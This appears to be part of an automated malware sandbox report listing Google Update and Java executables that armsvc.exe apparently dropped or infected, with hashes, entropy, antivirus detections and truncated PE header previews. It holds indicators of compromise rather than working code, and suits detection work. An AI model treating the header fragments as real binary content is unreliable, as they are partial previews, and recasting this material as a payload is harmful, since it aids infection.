                                                                                                                                                                              SSDEEP:24576:CkCKABl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CxKklLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:91FE4D84E52F2AB14CBE2391FFF95182
                                                                                                                                                                              SHA1:C5048F67D43007DB770F3086ED83168DE23C6D77
                                                                                                                                                                              SHA-256:78C52F39ACCE51A76A0D3C8CF68851978A73E01F54E9326F82720B5A40F1DA98
                                                                                                                                                                              SHA-512:B38299ACFF35B55AEEFE570CA983CDD840235472061559B815E70CB4900F948045214AD8DA8AEA5AAC510881368ADC39B0DC3438484BE49A4D1A3A22B07D2135
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... ......0......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1383936
                                                                                                                                                                              Entropy (8bit):4.680879131054022
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:0jNWBPm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GNm+LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F63C3954CEB6835D87655E6F990D5649
                                                                                                                                                                              SHA1:ABD2C8AEA4AE228446A7836CDBB0A22BCEDB2190
                                                                                                                                                                              SHA-256:E6FA8E41C23BBB36997A67CB781299B8307C77140E51A00907E85F812480AF84
                                                                                                                                                                              SHA-512:E8CD43152A8DB5DD8778629D03A2F737FB9CB5607DCFF4FD9576E6391DFD01FF2BED41A97FA09647B11EFAFDB13054E267BAF5A88FE5DB19ED2D84F0020FE229
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... .....Ns.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1458176
                                                                                                                                                                              Entropy (8bit):4.778606957671975
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:5ijRyhdsRrU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5ijsoRULNiXicJFFRGNzj3
                                                                                                                                                                              MD5:B42D394DF3454AE05D5C218B588789D4
                                                                                                                                                                              SHA1:959B78BA3ACF22DAF431E4B28E2B08DA29F91961
                                                                                                                                                                              SHA-256:1C1FF62B90C55DC98632A2156D472B057906C4A72E76F64F48AA6DE2749B4EC6
                                                                                                                                                                              SHA-512:5B6666720F32927D34EAE080EB66C41DA2372613B9059831DD9C0EF55BB16E9DFCA2A1FA3AA76CC66C71446B07812B13B9A54C7474136F38DC88BFCEF14EF005
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1498112
                                                                                                                                                                              Entropy (8bit):4.895441279741585
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:v16DmRF+wpx/Qaf7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ymRF+wn/Jf7LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F2E999B31E46A33A5511D0ADEAED278C
                                                                                                                                                                              SHA1:6B49EB83848BC96C3A549060FB19690A62494EF1
                                                                                                                                                                              SHA-256:DED04FBB729A843A5014864E442D9D6A33B40C951FA27BD613C39ECFC6FDAD8C
                                                                                                                                                                              SHA-512:9C435AA2932DE2EBE4047809B0FF65DE77492531C88F3D61BE38CA306E68F15EDBAA2BF2F5F8796253D9AA26C66E1B364A496E5996B9803739D631EBED16BDC9
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!.....~A...............................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1383936
                                                                                                                                                                              Entropy (8bit):4.680845476497741
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:dE21BPR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:62bZLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:905099D0E8106BE567206285D2286994
                                                                                                                                                                              SHA1:D7201C8A8EEBD76E9BE636B918BA2671F30D3485
                                                                                                                                                                              SHA-256:6FF7FEEE42EC2021549DF8E5672EE4C3D0CAEB0F31C01034D96DF933D1231146
                                                                                                                                                                              SHA-512:DDBE0CFE3D32C8BE93624C89F87C0885C3790714AEF64592F85A8427A0A8B1DF649C5890F01F8864E9D57A0F6FCE5308B36B1EFB53E52013383D4FEA0099E9FE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... .....r........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):105669632
                                                                                                                                                                              Entropy (8bit):7.999988662877057
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:3145728:KLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:oBWx/pt8U7E6aZRfIICU
                                                                                                                                                                              MD5:A7088D2F1E3A123C2303F66BE53D7FAB
                                                                                                                                                                              SHA1:19F5AEB48CB7AAED5B59801746502FB5090153B7
                                                                                                                                                                              SHA-256:6DE7265CC7E4B7849864A2300EC0676B8C76A429FCEE96B5A5A821AC477BA428
                                                                                                                                                                              SHA-512:E094454D9A09D07B7ACAFEE2D91B6DCFBD5B46B343896ECB4CB02662B0093C073F0533BDCD5E9D468A6082FC5C2A508FBAA48884D29A2138E5BBA9C00E79C616
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1313792
                                                                                                                                                                              Entropy (8bit):4.567754203403392
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:IJiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:IV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:961C9E0A666992043A5CD1DE4609A6C9
                                                                                                                                                                              SHA1:840818A0F30EC387A50F2D576A24661B7EB32561
                                                                                                                                                                              SHA-256:5DB5512E00D7BEF6FDEA15E9AEC3475ED5C27B09B46B6635EBDF317FEE08C62C
                                                                                                                                                                              SHA-512:5466E95B9FEA264CE25B5741188F0890CEF7BDD6D7D801BC0B8F10CA4F134DB39049ACC00DCC01962F6435C02939861BF095D03DDE44EE6EA2D213EF658DBBB3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................J......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.528877457721958
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:E2siJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:dW/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:35258FEFB2E303A0D201EF72DDA3A4A6
                                                                                                                                                                              SHA1:02030DB9ECA3863F9703520DF237C2C653B897F0
                                                                                                                                                                              SHA-256:E6AA029E23356B100BA7E3148F0CC72A46E2209BE641412DF562F6A87D9210D6
                                                                                                                                                                              SHA-512:271BF41E6BFB68E86ABB72BA0D0DC61B6B1CBA2C987C74E1C8DB9C947BFCEC72BEFDCD613A91E92B768AD1587AC6E46DE3D53C9AB3F4DA40E3E6728F85D540B3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.9949149928982655
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:EpwOtO7z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EmOtmzLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:51B97218FB8B0873831EA7CCD8AE7933
                                                                                                                                                                              SHA1:922A24CDEC6FC81AD043395CA1AC4E6C0A888353
                                                                                                                                                                              SHA-256:403DBCBADA3B78249EFBFE2F8C1BEA631925E96B72CF4722990A837212849DFE
                                                                                                                                                                              SHA-512:6DEB02C19C4EA9177DA682E00C24661D20B1499AC0C937817432A95AF29553B8B6A100FBF725144BFDECC666435E8A608DBAB3232A59A43F1105E8BED41349EE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1368064
                                                                                                                                                                              Entropy (8bit):4.635835347853591
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:w1C/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:w8LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:38FB01419B8C772FB58832012F5214CF
                                                                                                                                                                              SHA1:200C315038180F3F05BA2FC8F2035726694420D8
                                                                                                                                                                              SHA-256:A4DD391E3E8177AE222B62861F6216E9595274AB52420DE02683AEA67896CD9F
                                                                                                                                                                              SHA-512:B279D2B5D6C5C556B3CC96058A0918CD20BA553FBBDD909F5D969804D3C1CE82A07D79DAD49E645E43863B4E6D3AFA4859B103767DC99D906CC4031D72D18DBB
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................MR......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.9956057804374785
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:xKU/h/4KI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xr/VILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2275457420EFE79733AF3FA13F58A5D8
                                                                                                                                                                              SHA1:4EAE19A72734CDBD7E6348D5FBBEAAFB6AE1BDFF
                                                                                                                                                                              SHA-256:99A652CE39B0216F8E93801A5C54213BA68D909D223CC5FCCD93656A012F0D3F
                                                                                                                                                                              SHA-512:6C6B260D334A9F03E2B59D334112F978C2C0DA54D752A49EC5D6E9901DB8A3041DB8D57F5BDBF6B830123A93A8A5568E5D064866A5F6F07B446DBD21EFD63908
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1669632
                                                                                                                                                                              Entropy (8bit):5.069214998668617
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:3x7YiBLZ05jNTmJWExn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3xUiHIjNgnLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:063EC1E1AF1B075FA8B6D0940D3F931B
                                                                                                                                                                              SHA1:DA318EC9B8F473390EEA290B597BBE74158BF928
                                                                                                                                                                              SHA-256:44EBB98B729135CFEF8B2CF933AF3069C9E794CA5F207A73A8C6CA75B28FD6D0
                                                                                                                                                                              SHA-512:54E10DFF014D2DBBF0DA6388EDD07B1CEBA03C2083A9CD74E8987C53EABF5A8C17255CB60A6373FB26CD71824E523E622BAB034DBF786F21AB31D53618D078F4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529315567714302
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:qor8iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:VC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:73C9A3C30CC13E6F517D84DB5BEFEAA4
                                                                                                                                                                              SHA1:BCD806EB9542949E90A732C13E603CFDFCE917BF
                                                                                                                                                                              SHA-256:96C1CDAEF18D87F329093C46BE91FEC9BCB131C7F0552ECE9FF60EDA7624E967
                                                                                                                                                                              SHA-512:30374EC878C42409057B2F1DB5ACB52F5EA821592F86B4B717A7CAD6468CBACC1A3F378D9EE2E0D95B850F03233E3FDDE202587B847FDA20D5F1859DD627951B
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................?........................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1397760
                                                                                                                                                                              Entropy (8bit):4.695195579087999
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:IdP/J/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ABLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F65B07104911B03B0F2B6BD5902F2956
                                                                                                                                                                              SHA1:21B3C217D74A2109B50E9A02FE858E4FC2B4B0FD
                                                                                                                                                                              SHA-256:81824C90AC8DEA18E364D9BEDDD380060B2B86A82F779069E2A35822DF588592
                                                                                                                                                                              SHA-512:8BB602D649BD040417A506E5E659F4C8CC2F1028157F44C6817B0256B4B6093AD9F8492C17E5314C44CE89AE448FB9C1A1C53A5105226EFD5ED5784A43D21501
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` ................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529337100591426
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:kZ5EiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:ao/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:D893B479F41692CD885ADBFA38593888
                                                                                                                                                                              SHA1:2E527DBB88D83D717B17CC4B030103D304F41367
                                                                                                                                                                              SHA-256:CC0B4FB6EAC38BDF8DCEF0E51119360F37DEF354E38E3866707619FEB9D83AAB
                                                                                                                                                                              SHA-512:1F9D35409E38D731A687FCD09076B628618C7D5B9FD44B0FB7DA18D58E839AFD0F32C9109297240A1495DE9A25C64A8DBB017C8634DD1277694FF830046A3F73
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.52939263940427
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:mZlsiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:0k/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:F98EA5CD4356E287138D044BE405D796
                                                                                                                                                                              SHA1:E81701EFB0CEEB11736EDB48AE15DB16FF3872EB
                                                                                                                                                                              SHA-256:DBE6F7A9A21EC41FD53769966A8592369EB505999A4F66CE793987D67D427515
                                                                                                                                                                              SHA-512:190A5FDEB63BF121512FC9F17776254C3CE6721BE8E60499AD7519DFCFB1ACA14A78FE312B2B6A011DF5DFED6D6FE2BAE3D6979D9F55839AA85D064A53F072AA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529403200404629
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:yNlsiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Ek/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:BCBA6E8195A32E265C58682F7CC25F11
                                                                                                                                                                              SHA1:350D86F0FA399997476818EF02E89EEDEC4EF263
                                                                                                                                                                              SHA-256:46E296A1D1EC74E70CAF35DD911115EB18785F4A30CBDCD2104D663E437DAC9A
                                                                                                                                                                              SHA-512:BE8408E649D2273CDD4DB1AF3528B2CBB71FD245BB055B9A08DE93D91F81BB55BB779C9AE6EA96CC021D92D1BB88668F61224132E31D399CAE74F44EC305CF54
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................H.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

